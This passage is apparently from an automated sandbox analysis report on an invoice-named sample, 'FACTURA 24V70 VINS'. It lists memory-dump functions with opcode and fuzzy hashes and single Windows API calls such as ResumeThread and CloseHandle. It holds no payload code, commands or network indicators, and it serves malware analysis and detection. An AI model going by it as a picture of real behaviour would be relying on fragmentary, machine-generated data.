Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a5a783eab62192634aac4dbe2c6dfffcf02ac40fd725475680b4ef4962aed860
Instruction ID: c82c2d35f117f4283a738493ddf03abe065f40016fb6e91a14fba7dc42786aca
Opcode Fuzzy Hash: a5a783eab62192634aac4dbe2c6dfffcf02ac40fd725475680b4ef4962aed860
Instruction Fuzzy Hash: FA1102B68003499FDB10CF9AD545BDEBFF8AB48324F20845AE518A7600C3B5A594CFA1

Function 02F90CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(00000086), ref: 02F90D02

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bc4db204c1729463cf126eb10a24830d1862e21cc278711d239306d3e36bbde1
Instruction ID: ed84c947964e523b1fe513feb010c2254a991fc8344815f6f9fc0f0b24b2e745
Opcode Fuzzy Hash: bc4db204c1729463cf126eb10a24830d1862e21cc278711d239306d3e36bbde1
Instruction Fuzzy Hash: EE113AB1D003498FDB20DFAAC44579FFBF5AF88724F24841AD519A7240CB75A544CFA5

Function 0150B190 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0150B1F6

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a159f8e0a9fe036c779a608e59ab314f35ab1803d3d013a0a56e78b3c85054ba
Instruction ID: fc0735d0e1c0c44d822eb265d31769a1c3e6f001821df629adde8d0ab95ff5db
Opcode Fuzzy Hash: a159f8e0a9fe036c779a608e59ab314f35ab1803d3d013a0a56e78b3c85054ba
Instruction Fuzzy Hash: 7D11D2B6C0064A8FDB14DF9AC444A9EFBF4BB88324F10841AD929A7250D375A545CFA1

Function 02F93808 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02F93865

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2a5ffcfe7cf645cdd360baedf3368f1687bcda7b9f080750d30b9f87dc5c6ad1
Instruction ID: d128815703073dacd75918046460ad63c853af3eb869cb157eaeb9dacaef89d7
Opcode Fuzzy Hash: 2a5ffcfe7cf645cdd360baedf3368f1687bcda7b9f080750d30b9f87dc5c6ad1
Instruction Fuzzy Hash: 0D11D3B68003499FDB10DF9AC585BDEBBF8FB48724F10845AE558A7210C3B5A544CFA1

Function 0760089C Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 0760709F

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0d57d82daf7b12ac7f001622ee8e899813aa4441985b692797d972dfa4ab3cb1
Instruction ID: 8cdb29a837d1c7418514948ca6f03c2f614000539c92cbcd7f988bf71b71718a
Opcode Fuzzy Hash: 0d57d82daf7b12ac7f001622ee8e899813aa4441985b692797d972dfa4ab3cb1
Instruction Fuzzy Hash: CB1128B18003598FDB10DF9AC844BDEBBF8FF48324F108459E519A3241D779A944CFA5

Function 076293E8 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07629D99,?,?), ref: 07629F40

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 05690ca33ff61a62213fa73a3b3256c466bca81ca3512c767e4c8f371af24959
Instruction ID: e48ed9dd736fa556c19b478d1b2f6891d18d55b469f75c3f951ae14c2fc6774d
Opcode Fuzzy Hash: 05690ca33ff61a62213fa73a3b3256c466bca81ca3512c767e4c8f371af24959
Instruction Fuzzy Hash: 091146B18007098FCB50DF9AC444BDEBBF4EB48320F10841AE659A7340D378A544CFA4

Function 0760703E Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 0760709F

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1ec60d1a2366e0539c76c87e67c81e1915eddcdeef98715c09cc8c9f5d2daf60
Instruction ID: 23316f5c3ae1cb6107a8c4d59a778ebf44c070409ed9c180e47647ea85291a64
Opcode Fuzzy Hash: 1ec60d1a2366e0539c76c87e67c81e1915eddcdeef98715c09cc8c9f5d2daf60
Instruction Fuzzy Hash: 8C1128B18002498FDB10DF9AC9457DEFBF4BF48324F20845AD519A3240D779A544CFA5

Function 07629EE3 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07629D99,?,?), ref: 07629F40

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8c0e5ad107b083973e9c6a52165e900805e760a3c25a0a11e8712f33011fd813
Instruction ID: 5830bfde0ddebf1632cd521739dee70aa1c42f749d626a9795b8b1d03c7eef2b
Opcode Fuzzy Hash: 8c0e5ad107b083973e9c6a52165e900805e760a3c25a0a11e8712f33011fd813
Instruction Fuzzy Hash: 441125B28007498FCB50DF9AC545BDEBBF4EB88320F14841AE959A7340D779A544CFA5

Function 014AD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205789257.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14ad000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c431c361f62175a4c4804522c205513d927524e0ab896e92cd9207b6156505c1
Instruction ID: 1915b2a2b2a9b56aafe31695702370118c34e57a82f46fa00fefa44b11040b9f
Opcode Fuzzy Hash: c431c361f62175a4c4804522c205513d927524e0ab896e92cd9207b6156505c1
Instruction Fuzzy Hash: AE2145B2900240EFDB05DF54D9C0B2BBF61FB98318F60C56EE9490B666C336D416CBA1

Function 014AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205789257.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14ad000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68947f7c4343c596909fb6b4c32fe2149bf6a4ae819d5e4b129aae6f0a611ba0
Instruction ID: 1446b2dfe4ac67b34e3c38943fc08bcfbfc5c9b915355d5ad8ce132f70e0a6fa
Opcode Fuzzy Hash: 68947f7c4343c596909fb6b4c32fe2149bf6a4ae819d5e4b129aae6f0a611ba0
Instruction Fuzzy Hash: 122136B6900204DFDB05DF44D9C0B66BF65FBA8324F60C17ED9090B666C336E456CAA1

Function 014BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205829656.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14bd000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cb45ac59ae180b1ab0e153925e7d1568e2e8919d7a5be2c5f969adc6be15ca
Instruction ID: a057765cd6ed70ab32e6997fec38230201315aa49a521ef59b201ec586d52ea0
Opcode Fuzzy Hash: 57cb45ac59ae180b1ab0e153925e7d1568e2e8919d7a5be2c5f969adc6be15ca
Instruction Fuzzy Hash: 682103B5904200DFDB15DF58D9C0B66BB61EB8431CF20C5AED90A0B366C37AD407CA71

Function 014BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205829656.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14bd000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a785800076dc65cf674916d0f001adca95b232f6dfe9e7020e498d86f1388a
Instruction ID: a337b256b48a1cbb30b6b793bdee7a77c55b58bbe4349c45f4e8067f05503e89
Opcode Fuzzy Hash: 95a785800076dc65cf674916d0f001adca95b232f6dfe9e7020e498d86f1388a
Instruction Fuzzy Hash: 4A213775904280EFDB09DF94D9C0B66BB61FB84328F20C5AED9094B362C776D406CB71

Function 014BD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205829656.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14bd000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe7165adfdc57dbee8350f0ccf62dbf9b2f367f66bc2f0c04319253fa47e06f
Instruction ID: 047b379184e592ab63cfe7371218c79d174359d1e8b9e51f2c014162b5c7e162
Opcode Fuzzy Hash: 0fe7165adfdc57dbee8350f0ccf62dbf9b2f367f66bc2f0c04319253fa47e06f
Instruction Fuzzy Hash: 1E2180755093808FCB02CF24D5D0756BF71EB46218F28C5DBD8498B2A7C33A980ACB62

Function 014AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205789257.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14ad000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 6a92059304a438a478c24ddeb4703de89148c16f1ede89bda7fff548c50a0d8f
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 8211DFB6804280CFDB02CF44D9C4B56BF71FB94324F24C2AAD8090B667C33AE456CBA1

Function 014AD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205789257.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14ad000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: b9dc6b2081dceb23d5c180c322fb35bac83fb59a3e18af2510ef2739479db5a2
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 7F11B1B6904280CFCB16CF54D9C4B1ABF71FB94318F24C6AAD8490B667C33AD456CBA1

Function 014BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2205829656.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14bd000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 65e4d6df36143627e6c15fa85c14212f5fce2b8cb07f8d1f3fafa10c80e1651a
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 4211BB75904280DFCB06CF54C5C0B56BFA1FB84228F24C6AAD8494B3A6C33AD40ACB61

Non-executed Functions

Function 056ED7D8 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2208864792.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56e0000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320180f910d5cf3e5aadfebd9097e8f32bf5e859e664e041a92172e876d68640
Instruction ID: 2736ee8757f6f147884392b9b0d9b1c1dcd90ff90bec6a65c37bf4dd3b68a819
Opcode Fuzzy Hash: 320180f910d5cf3e5aadfebd9097e8f32bf5e859e664e041a92172e876d68640
Instruction Fuzzy Hash: 20F1CA75B06211CFCB19DB68C494A3E7BB2BF85600B2A84ADD406DB7A1DF71DC42CB91

Function 0760E75C Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4350c3b2f6901a3ae1802c91466b6aa11d1787cfc9b9c4bfd76eea0207eb2a5
Instruction ID: 702312dcee3b3fbbbd322fc3ef87a3c3cd6bb6d3a2a8f63b2bfd5b0553b43fde
Opcode Fuzzy Hash: b4350c3b2f6901a3ae1802c91466b6aa11d1787cfc9b9c4bfd76eea0207eb2a5
Instruction Fuzzy Hash: 76E12DB4E002698FDB18DFA9C590AAEBBF2FF89300F24855AD415A7355C7319D42CFA1

Function 07604F83 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28de1461125cc0269321f9b70e43423c8f6b5a9e44bf4f215e6f39ded979d6b
Instruction ID: c58cb391506fcb887da11dbcf225188f8d091e81797930aea9fd117d67b15772
Opcode Fuzzy Hash: c28de1461125cc0269321f9b70e43423c8f6b5a9e44bf4f215e6f39ded979d6b
Instruction Fuzzy Hash: E6E11EB4E002598FDB14CFA9C580AAEFBB2FF89305F248159D416A7356D774AD42CFA0

Function 076053C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5239827d4a1df6acbe0df0604506efbb9994a2e9cc2e6d495411502e681bc9
Instruction ID: 470e4cc2bc667bc851ade5a6bf58561b59d2a44baabeb1971c1abb80b6e6f079
Opcode Fuzzy Hash: 4f5239827d4a1df6acbe0df0604506efbb9994a2e9cc2e6d495411502e681bc9
Instruction Fuzzy Hash: 70E11CB4E002598FDB14CFA9C584AAEFBB2FF89305F248159D415AB356D734AD42CFA0

Function 07606138 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e198d54de9b5c86157a7ef860d7c55ff0ab69b00f7fbed67ecc94d799a85f37
Instruction ID: f1d309a68ac671d7fad616d679d236fe437ff58b7748f6fbbd8f4c26736239ff
Opcode Fuzzy Hash: 1e198d54de9b5c86157a7ef860d7c55ff0ab69b00f7fbed67ecc94d799a85f37
Instruction Fuzzy Hash: ADE11BB4E002698FDB14CFA9C580AAEFBB2FF89304F248259D415A7355D734AD46CFA0

Function 0760EBC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 654794315bfbc4380e060a174b9cd43fb2c841c35d0ba6452e2c71ee0fd4a257
Instruction ID: bca90b926627f601167262dd772c46f41ca0e5b3c38ed7073fe089a1ab835e3a
Opcode Fuzzy Hash: 654794315bfbc4380e060a174b9cd43fb2c841c35d0ba6452e2c71ee0fd4a257
Instruction Fuzzy Hash: DFE11BB4E002698FCB14DFA9C590AAEBBF2FF89304F248569D415A7355D731AD42CFA0

Function 07605888 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82ea6449baaf4eaca4f887eab93432db04a2cc6fe02d6fa73c497c006c634a7
Instruction ID: 683c41580ae980be5c84cfc2f0986c25da23fdf077d1b2f4f6b29a2245643d19
Opcode Fuzzy Hash: c82ea6449baaf4eaca4f887eab93432db04a2cc6fe02d6fa73c497c006c634a7
Instruction Fuzzy Hash: 48E10CB4E001598FDB14CFA9C590AAEFBB2FF89305F248159D415AB356D734AD42CFA0

Function 02F90E28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81f3297e3242fb7456657d469b7fc5d196d54e6307b55e9ba80619cc5479bde
Instruction ID: 681ffce05dc8fb9deb0db18b39415ccefc038bd5ab048703e99182d95e03ce06
Opcode Fuzzy Hash: e81f3297e3242fb7456657d469b7fc5d196d54e6307b55e9ba80619cc5479bde
Instruction Fuzzy Hash: 6FE1EB74E0025A8FDB14DFA9C590AAEBBF2FF89304F248169D518A7355D7319D82CFA0

Function 02F90478 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de602ac47785c6ad8a53c1599d357bc7fd20da4275dcacecaa313009a3e2a763
Instruction ID: ce85ebf080e8175b9045985d717236583305aacc6e89d8b2e95a799334d5a41a
Opcode Fuzzy Hash: de602ac47785c6ad8a53c1599d357bc7fd20da4275dcacecaa313009a3e2a763
Instruction Fuzzy Hash: E8E10A74E002598FDB14DFA9C590AAEBBF2FF88304F248169D514A7355DB31AD82CFA0

Function 02F90040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ca39c20f32983db21093dff024b7f45614f3cd3853793fee4437e7c92c2d2b
Instruction ID: b73bfb11bcded79c733726ff206e0909ae7d7a371523edfdbfd23646c2937b9a
Opcode Fuzzy Hash: a5ca39c20f32983db21093dff024b7f45614f3cd3853793fee4437e7c92c2d2b
Instruction Fuzzy Hash: 1EE1DA74E002598FDB14CF99C590AAEBBF2FF89304F248269D514A7355DB31AD82CF61

Function 056E7CD0 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2208864792.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56e0000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58d90a1cda40b352e752e56d60ea952ea0b706a2410cda4f7981166a5fdc3ab
Instruction ID: e6a190166f25d262817d318efe3dbfb4a58ce27efaabe6b1b1b9a04ed334f948
Opcode Fuzzy Hash: d58d90a1cda40b352e752e56d60ea952ea0b706a2410cda4f7981166a5fdc3ab
Instruction Fuzzy Hash: CBE1E63582075ACACB00EFA5E890A99F771FFE5300F61979AD10977264EF706AC4CB81

Function 056E7CE0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2208864792.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56e0000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad9ec5ad40495ce6eb179f7995ed4a0b7651a7073c52b5f48eba87139f71d71
Instruction ID: a0ce923e9c93c39d751d7db46484e648f197bed478f11a485d3eaac5f7c1cadf
Opcode Fuzzy Hash: aad9ec5ad40495ce6eb179f7995ed4a0b7651a7073c52b5f48eba87139f71d71
Instruction Fuzzy Hash: 2DD1E63582075ADACB00EFA5E890699F771FFE5300F61979AD10977224EFB06AC4CB81

Function 0150DC4C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 942ad6202320ecb942e089cb086ea5aa71d740512935454c21e7c4d13aa0f9d5
Instruction ID: 220c07769834524b8d6a422fefb0098b86e042fa64e0ea8f1a198b1ad4738204
Opcode Fuzzy Hash: 942ad6202320ecb942e089cb086ea5aa71d740512935454c21e7c4d13aa0f9d5
Instruction Fuzzy Hash: DBA16F32E0060A8FCF1ADFF8C84459EBBB2FF84300B15456AE905AF2A5DB75E945CB40

Function 07607F78 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0987dc179ac0caec90535c142662e04d3aaf7ec92d8b6c26b900d7e993bc41
Instruction ID: b2e1529a3c8da408329dfaea0a57e5941b9ff588d8091fd118b79bac4902f150
Opcode Fuzzy Hash: ce0987dc179ac0caec90535c142662e04d3aaf7ec92d8b6c26b900d7e993bc41
Instruction Fuzzy Hash: 3C7192B4E002598FDB08DFAAC984A9EFBF2BF88300F14C166D419AB355D7749942CF90

Function 02F90006 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd50abd2dbdf23e2f70de8023b386ba9df887677728ec00589295e066558e2a5
Instruction ID: 25e0fe0a4d25bf61b4c011fffa998419f86a3266461c2c60c99f0722fdb4166a
Opcode Fuzzy Hash: cd50abd2dbdf23e2f70de8023b386ba9df887677728ec00589295e066558e2a5
Instruction Fuzzy Hash: 22618274D042598FDB15CF69C5916AEBBF2FF8A204F2881AAC558AB352C7309D42CF61

Function 07607D08 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ec413175c36f5f0c53e20de03ffc9588c6c9630896f3418985866f19fc10ce
Instruction ID: 5db0187fb46cc7c5dae9e9b829d1fe70aed8de883ca424517da34f5f66b3ce14
Opcode Fuzzy Hash: 07ec413175c36f5f0c53e20de03ffc9588c6c9630896f3418985866f19fc10ce
Instruction Fuzzy Hash: EE5180B5E116599FDF08CFEAC9446EEFBB2BF89300F10802AD419AB254DB345906CB90

Function 02F90469 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a2a8e6e6f0ecf95d9ad27d4e13a7d6869cbeac9279b0972c3820728f3fa9ac
Instruction ID: db93fbf12e84ed7c8d18bd64188d56b43225de3d7dc09c9ba4dc268ae0fa1f25
Opcode Fuzzy Hash: 77a2a8e6e6f0ecf95d9ad27d4e13a7d6869cbeac9279b0972c3820728f3fa9ac
Instruction Fuzzy Hash: 9E511A74E002598FDB14CFA9C5905AEFBF2BF89304F24816AD518A7355DB309D82CFA1

Function 0760EBB8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2238b3cfe81fe6bf37c2606c93ec36b6e9bdbf7fc441014ee66e3b95cdd8346b
Instruction ID: e716171bc90ca6f64d7c5fb751233486a93aad57d5e5b1a99b471dd4137a3bda
Opcode Fuzzy Hash: 2238b3cfe81fe6bf37c2606c93ec36b6e9bdbf7fc441014ee66e3b95cdd8346b
Instruction Fuzzy Hash: 06512CB4E002298FDB18DFA9C5405AEFBF2FF89304F24856AD419A7355D7319942CFA1

Function 07607F73 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2ca2df1edcd8482d85e1433c056e3f3d98d0159e9e29113c8ebcb99a68bcb0
Instruction ID: 1895a965540247886a8271112d2690e6f12dfc04ae51ed9325acc610f5c4fde7
Opcode Fuzzy Hash: fd2ca2df1edcd8482d85e1433c056e3f3d98d0159e9e29113c8ebcb99a68bcb0
Instruction Fuzzy Hash: 9D5163B5E006599FDB08DFAAC94469EFBF2BF88300F14C16AD419AB354DB7499428F50

Function 07607D03 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f0a4727c4b8e39bae5f5b516e2bdfa50cde8a9b43bef11aa4a2d62f0cd0630
Instruction ID: c24cccf017657ca57571a2033f997cfa4709e4ab5492bd28d89a64ae4a0c2910
